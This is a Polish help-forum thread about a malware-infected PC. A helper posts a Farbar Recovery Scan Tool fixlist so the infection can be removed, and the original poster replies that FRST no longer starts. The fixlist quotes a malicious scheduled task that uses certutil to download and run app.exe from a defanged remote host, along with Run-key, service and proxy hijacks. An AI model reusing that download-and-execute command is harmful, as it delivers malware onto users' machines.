Elektroda.pl
Elektroda.pl
X

Search our partners

Find the latest content on electronic components. Datasheets.com
Elektroda.pl
Please add exception to AdBlock for elektroda.pl.
If you watch the ads, you support portal and users.

Wolny system i i dużo dziwnych procesów w menadżerze urządzeń

wanio18 10 Jun 2018 15:07 627 2
  • #2
    krzychupar
    Level 43  
    Otwórz notatnik systemowy i wklej:

    Task: {1E9D55C5-5AEF-4FFF-9338-E6E72366AF3A} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\KgCONmC.dll",#1
    Task: {28EC3352-6C2F-4B70-9C61-85324DCBBFC2} - System32\Tasks\WPDRSE\Config_Error\Version => C:\Users\PEPE\AppData\Roaming\SimanticSt.exe [2018-06-09] () <==== UWAGA
    Task: {407713C3-78CD-4B4D-AF37-F71056B0750B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\PEPE\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\PEPE\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {49272B40-03A4-49BE-8F08-2DB35EB5B2EC} - System32\Tasks\OneDrive\OneDriveUpdate => C:\ProgramData\onedrive.exe [2018-06-09] (MDLS) <==== UWAGA
    Task: {578A2551-4A0F-45AA-AD6E-7C608194ECE9} - System32\Tasks\{F7BA8008-FFCD-1F55-9330-0668DB86EEE9} => C:\Users\PEPE\AppData\Roaming\lEIauYasn.exe <==== UWAGA
    Task: {78101DE5-A7D3-43E8-B431-D520064090ED} - System32\Tasks\{3AFC12E1-96AB-4277-81F9-374524ACC300} => C:\Windows\system32\pcalua.exe -a "C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
    Task: {9188501A-26AA-45FA-BDB1-151674C1211F} - System32\Tasks\Driver Booster SkipUAC (PEPE) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
    Task: {9B5E6EC0-6289-4875-BC82-2D98455021B3} - System32\Tasks\Opera scheduled Autoupdate 4086469641 => C:\Windows\system32\cmd.exe /c start "" "C:\Users\PEPE\AppData\Roaming\Microsoft\Windows\jggvwgee\agedijca.exe"
    Task: {B4605705-F6E7-4A4E-9B1B-125D16C0BC1A} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\rUVvTuVShUosg.dll",#1
    Task: {C291305A-5732-41BA-89F4-1D914CF4D9FD} - System32\Tasks\{9494AC32-14FA-4F94-A027-D4E34F731EC7} => C:\Windows\system32\pcalua.exe -a "C:\MOJE\Liga Polska Manager 2005 Nowa Edycja\Liga Polska Manager 2005 Nowa Edycja\LPM_dodatki\LPM_dodatki.exe" -d "C:\MOJE\Liga Polska Manager 2005 Nowa Edycja\Liga Polska Manager 2005 Nowa Edycja\LPM_dodatki"
    Task: {DBDAA8F6-AC26-4DBD-A60D-FE83A8F41393} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-09] () <==== UWAGA
    Task: {E4030C65-C2FF-493D-9922-1F770F818BBB} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\fKVsjEZ.dll",#1
    Task: {F753B4C9-DC4B-47E6-994F-EBA2D46A3FD4} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\UvuSUs.dll",#1
    Task: {F8C054DD-152F-4516-A842-2375F86A4D56} - System32\Tasks\WobUIKhuMtTTi2 => C:\Windows\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\bOqMUCC.wsf"
    ShortcutWithArgument: C:\Users\PEPE\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    Hosts:
    HKLM\...\RunOnce: [OMEWPRODUCT_7AW6K] => C:\Users\PEPE\AppData\Local\Temp\is-7DSTI.tmp\up.exe [52224 2018-06-09] (WFKR5) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_E1TK5] => C:\Users\PEPE\AppData\Local\Temp\is-44A1N.tmp\up.exe [52224 2018-06-09] (WFKR5) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_TAWB0] => C:\Users\PEPE\AppData\Local\Temp\is-M70NQ.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_VUSNO] => C:\Users\PEPE\AppData\Local\Temp\is-8SUJI.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_LDK2H] => C:\Users\PEPE\AppData\Local\Temp\is-71QSN.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    Winlogon\Notify\ScCertProp: wlnotify.dll [X]
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [IcyShadow] => C:\Windows\rss\csrss.exe [3115520 2018-06-09] () <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6781667] => C:\Users\PEPE\AppData\Roaming\xhnbjchwoww\2vdq2dwz41n.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [375389] => C:\Users\PEPE\AppData\Roaming\yktwrckuixu\kux5akzhuhb.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [7900825] => C:\Users\PEPE\AppData\Roaming\ygm5vfkllhr\kofoq3gm2pl.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [5314677] => C:\Users\PEPE\AppData\Roaming\bt2qmu3rsnr\4u0e1ehgfxy.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [HXO0JCFEU0PU1GF] => "C:\Program Files\U1404I60IX\U1404I60I.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [T47IRS1602ODLE4] => "C:\Program Files\WZ78110KMU\WZ78110KM.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [TNA3MGUPL4JY2QJ] => "C:\Program Files\5GFT8WOV6X\5GFT8WOV6.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [8803374] => C:\Users\PEPE\AppData\Roaming\lravkggywmr\lmrpkcyume4.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [SAJV7F8AE94PJOP] => "C:\Program Files\JN9WV7XGN5\JN9WV7XGN.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [B3CGXP0NT57S6NW] => "C:\Program Files\JDRCO96B2U\ER8JGDWUW.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [297539] => C:\Users\PEPE\AppData\Roaming\fzqjgnnv4ts\qrfd43zulby.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [1833478] => C:\Users\PEPE\AppData\Roaming\5ol3hfw0i53\j4gzx1uocev.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [2703192] => C:\Users\PEPE\AppData\Roaming\hwwwf0otu4c\motcmuf0nim.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [7078001] => C:\Users\PEPE\AppData\Roaming\ghbkjwdiprh\b3000yzoog3.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9975943] => C:\Users\PEPE\AppData\Roaming\u1mkedytak4\sime4pzuhgf.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3261151] => "C:\Users\PEPE\AppData\Roaming\jlkiddfhrn4\1vfy4zae3pd.exe" /VERYSILENT
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [1006476] => C:\Users\PEPE\AppData\Roaming\4wv25smxx1a\p4ftj0ho2zb.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6382261] => C:\Users\PEPE\AppData\Roaming\bgkjaa0hgwj\ox44evm1kc2.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [4689371] => C:\Users\PEPE\AppData\Roaming\wu3dhgx44ge\svo33wl52dl.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [CNUEOUEB80WWYVE] => "C:\Program Files\EXH5GK5KYR\EXH5GK5KY.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [JJOIVEL9HLPLMAY] => "C:\Program Files\FIV342M69S\FIV342M69.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [L1TBNL7C6KLI885] => "C:\Program Files\HIOTWTRHRL\HIOTWTRHR.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [4DRYQC2GLY2S1ZG] => "C:\Program Files\4TEV7LPLS9\4TEV7LPLS.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [SAEN971PNZTGGOJ] => "C:\Program Files\3TY6J60GGJ\3TY6J60GG.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [CloudNet] => C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [W3OISUQKYV9O43H] => "C:\Program Files\4C0OGD6CHL\4C0OGD6CH.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [J5W2V5I6Z7R3JD8] => "C:\Program Files\EJQOGB2HFD\EJQOGB2HF.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9557954] => C:\Users\PEPE\AppData\Roaming\kpbvi1xqltx\ht34v4nvjis.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9502162] => C:\Users\PEPE\AppData\Roaming\5d41pa3oj0n\gh5f33xakve.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [2357471] => C:\Users\PEPE\AppData\Roaming\dzyzhwlodii\myuqguqwteh.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3739347] => C:\Users\PEPE\AppData\Roaming\ofxblenyswn\accunqs2kqh.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [HJNXRG3VBFTNSR2] => "C:\Program Files\UBHO2MCGO3\70O3AMIHN.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3253657] => C:\Users\PEPE\AppData\Roaming\jzjpu0nqs3a\f2wyuukmesc.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6U0A0XILN5D4QNO] => "C:\Program Files\G4WHR60SS1\G4WHR60SS.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\MountPoints2: {d4b8b716-6c0a-11e8-84f6-88ae1db550e1} - F:\autorun.exe
    ShellExecuteHooks: Brak nazwy - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] () <==== UWAGA
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    ProxyEnable: [S-1-5-21-2591441210-2276695346-2989985460-1000] => Proxy [funkcja włączona]
    ProxyServer: [S-1-5-21-2591441210-2276695346-2989985460-1000] => http=127.0.0.1:8080;https=127.0.0.1:8080
    ManualProxies: 1http=127.0.0.1:8080;https=127.0.0.1:8080
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...jMGSilrANZDs28yoW6Oj1Rh74R7xpgNAr3jvM2nDJ3ziw,,
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2591441210-2276695346-2989985460-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2591441210-2276695346-2989985460-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    BHO: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\tMqRWLa.dll => Brak pliku
    BHO-x32: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\kGzWr4oY.dll => Brak pliku
    "gpkpevzc" => serwis został odblokowany. <==== UWAGA
    S2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S2 gpkpevzc; C:\Windows\SysWOW64\gpkpevzc\ggflwkru.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    S4 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
    S4 WNetworkMgmt; C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe [6232185 2018-05-22] () [Brak podpisu cyfrowego] <==== UWAGA <==== UWAGA
    S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
    2018-06-10 13:29 - 2018-06-10 13:29 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ofxblenyswn
    2018-06-10 13:29 - 2018-06-10 13:29 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\jzjpu0nqs3a
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\wu3dhgx44ge
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\kpbvi1xqltx
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dzyzhwlodii
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u1mkedytak4
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\hwwwf0otu4c
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ghbkjwdiprh
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fzqjgnnv4ts
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\bgkjaa0hgwj
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\5ol3hfw0i53
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\5d41pa3oj0n
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\4wv25smxx1a
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\yktwrckuixu
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ygm5vfkllhr
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\xhnbjchwoww
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\lravkggywmr
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\bt2qmu3rsnr
    2018-06-10 13:17 - 2018-06-10 10:38 - 001402880 _____ C:\Users\PEPE\Desktop\HiJackThis.msi
    2018-06-10 11:17 - 2018-06-10 11:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3pkuyes3fon
    2018-06-10 11:17 - 2018-06-10 11:17 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\r2rdoz2rzvz
    2018-06-10 11:17 - 2018-06-10 11:17 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\2hkwr4tnoph
    2018-06-10 11:14 - 2018-06-10 11:14 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\pziqfnespxp
    2018-06-10 10:55 - 2018-06-10 10:55 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\e0iougyefwz
    2018-06-10 10:55 - 2018-06-10 10:55 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\1sfzyczm2zi
    2018-06-10 10:54 - 2018-06-10 10:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\q4lxahy5kti
    2018-06-10 10:54 - 2018-06-10 10:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\0dyjkrcrwn5
    2018-06-10 10:39 - 2018-06-10 10:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\okxmtadakx1
    2018-06-10 10:39 - 2018-06-10 10:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\4akhfzy1tzy
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\mvskvcbsfqr
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3y1buftkesi
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3tnhp1yvmeg
    2018-06-10 10:28 - 2018-06-10 10:28 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3zfdoliaiur
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ymbuxr21q2f
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\wyit3u50moe
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u2xll2bihn5
    2018-06-10 00:03 - 2018-06-10 00:03 - 000003160 _____ C:\Windows\System32\Tasks\{3AFC12E1-96AB-4277-81F9-374524ACC300}
    2018-06-10 00:03 - 2018-06-10 00:03 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\gd4ps2y0vok
    2018-06-09 23:59 - 2018-06-09 23:59 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ogskuejbk3p
    2018-06-09 23:59 - 2018-06-09 23:59 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fup2a5rlydn
    2018-06-09 23:39 - 2018-06-09 23:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\b1tepslxpo1
    2018-06-09 23:36 - 2018-06-09 23:36 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\n2ag50agawg
    2018-06-09 23:36 - 2018-06-09 23:36 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3iux4viih3y
    2018-06-09 23:34 - 2018-06-09 23:34 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dxq0jlg1y5d
    2018-06-09 23:34 - 2018-06-09 23:34 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3qrbioxyvqv
    2018-06-09 23:33 - 2018-06-09 23:33 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\2d2oyzn2rdy
    2018-06-09 23:31 - 2018-06-09 23:31 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u0axfur23lk
    2018-06-09 23:31 - 2018-06-09 23:31 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dczrc50qxm2
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fniqroczze5
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\enizmo5ivtu
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\uwbaniz23e1
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ecalsm2sq2u
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\cde1flexiqm
    2018-06-09 23:18 - 2018-06-09 23:18 - 006420480 _____ C:\Users\PEPE\AppData\Roaming\SimanticSt.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 007627776 _____ C:\Users\PEPE\AppData\Local\agent.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000278508 _____ C:\Users\PEPE\AppData\Local\Geoplus.bin
    2018-06-09 23:12 - 2018-06-09 23:12 - 000140800 _____ C:\Users\PEPE\AppData\Local\installer.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000126464 _____ C:\Users\PEPE\AppData\Local\noah.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000070896 _____ C:\Users\PEPE\AppData\Local\Config.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000018432 _____ C:\Users\PEPE\AppData\Local\Main.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000005568 _____ C:\Users\PEPE\AppData\Local\md.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\mg4lmk2dv0v
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\FastDataX
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\f1cga4zlz4k
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\0tjyzs5squi
    2018-06-09 23:32 - 2018-06-09 23:28 - 000389120 ___SH (MDLS) C:\ProgramData\onedrive.exe
    1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 _____ (Microsoft Corporation) C:\Program Files (x86)\Common Files\Eaowau.exe
    2018-06-09 23:18 - 2018-06-09 23:18 - 006420480 _____ () C:\Users\PEPE\AppData\Roaming\SimanticSt.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 007627776 _____ () C:\Users\PEPE\AppData\Local\agent.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000070896 _____ () C:\Users\PEPE\AppData\Local\Config.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000278508 _____ () C:\Users\PEPE\AppData\Local\Geoplus.bin
    2018-06-09 23:12 - 2018-06-09 23:26 - 000017568 _____ () C:\Users\PEPE\AppData\Local\InstallationConfiguration.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000140800 _____ () C:\Users\PEPE\AppData\Local\installer.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 001810944 _____ (TODO: <Company name>) C:\Users\PEPE\AppData\Local\KonkRandom.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 001987584 _____ () C:\Users\PEPE\AppData\Local\KonkRandom.tst
    2018-06-09 23:12 - 2018-06-09 23:12 - 000018432 _____ () C:\Users\PEPE\AppData\Local\Main.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000005568 _____ () C:\Users\PEPE\AppData\Local\md.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000126464 _____ () C:\Users\PEPE\AppData\Local\noah.dat
    2018-06-09 23:13 - 2018-06-09 23:13 - 001895382 _____ () C:\Users\PEPE\AppData\Local\Redquadphase.bin
    2018-06-09 23:12 - 2018-06-09 23:26 - 000929792 _____ () C:\Users\PEPE\AppData\Local\sham.db
    2018-06-09 23:13 - 2018-06-09 23:13 - 000032038 _____ () C:\Users\PEPE\AppData\Local\uninstall_temp.ico
    2018-06-09 23:11 - 2018-06-09 23:11 - 000000003 _____ () C:\Users\PEPE\AppData\Local\wbem.ini
    C:\Users\PEPE\AppData\Local\Temp\is-7DSTI.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-44A1N.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-M70NQ.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-8SUJI.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-71QSN.tmp\up.exe
    C:\Windows\rss\csrss.exe
    C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.
  • #3
    wanio18
    Level 9  
    Problem jest taki że teraz nawet nie chce mi się uruchomić FRST.exe